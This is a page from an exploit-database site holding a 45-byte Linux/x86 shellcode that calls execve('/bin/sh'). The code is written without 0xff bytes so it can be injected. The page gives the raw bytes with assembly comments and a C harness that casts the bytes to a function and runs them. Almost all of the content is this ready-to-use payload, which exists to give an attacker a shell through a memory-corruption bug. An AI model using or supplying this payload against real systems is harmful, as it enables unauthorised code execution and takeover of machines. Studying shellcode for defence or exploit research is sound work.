[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 execve /bin/sh IA32 0xff-less 45 bytes

Author
anathema
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7111
Category
shellcode
Date add
25-09-2004
Platform
linux/x86
================================================
linux/x86 execve /bin/sh IA32 0xff-less 45 bytes
================================================






/*

  0xff-less execve() /bin/sh by anathema <anathema@hack.co.za>

*/

#include <stdio.h>
#include <stdlib.h>

unsigned char code[] = 

/* Linux/IA32 0xff-less execve() shellcode.  */

"\x89\xe6"                          /* movl %esp, %esi          */
"\x83\xc6\x30"                      /* addl $0x30, %esi         */
"\xb8\x2e\x62\x69\x6e"              /* movl $0x6e69622e, %eax   */
"\x40"                              /* incl %eax                */
"\x89\x06"                          /* movl %eax, (%esi)        */
"\xb8\x2e\x73\x68\x21"              /* movl $0x2168732e, %eax   */
"\x40"                              /* incl %eax                */
"\x89\x46\x04"                      /* movl %eax, 0x04(%esi)    */
"\x29\xc0"                          /* subl %eax, %eax          */
"\x88\x46\x07"                      /* movb %al, 0x07(%esi)     */
"\x89\x76\x08"                      /* movl %esi, 0x08(%esi)    */
"\x89\x46\x0c"                      /* movl %eax, 0x0c(%esi)    */
"\xb0\x0b"                          /* movb $0x0b, %al          */
"\x87\xf3"                          /* xchgl %esi, %ebx         */
"\x8d\x4b\x08"                      /* leal 0x08(%ebx), %ecx    */
"\x8d\x53\x0c"                      /* leal 0x0c(%ebx), %edx    */
"\xcd\x80"                          /* int $0x80                */
;

void main()
{
  void (*s)() = (void *)code;

  printf("Shellcode length: %d\nExecuting..\n\n",
      strlen(code));
  s();
}



#  0day.today [2024-12-24]  #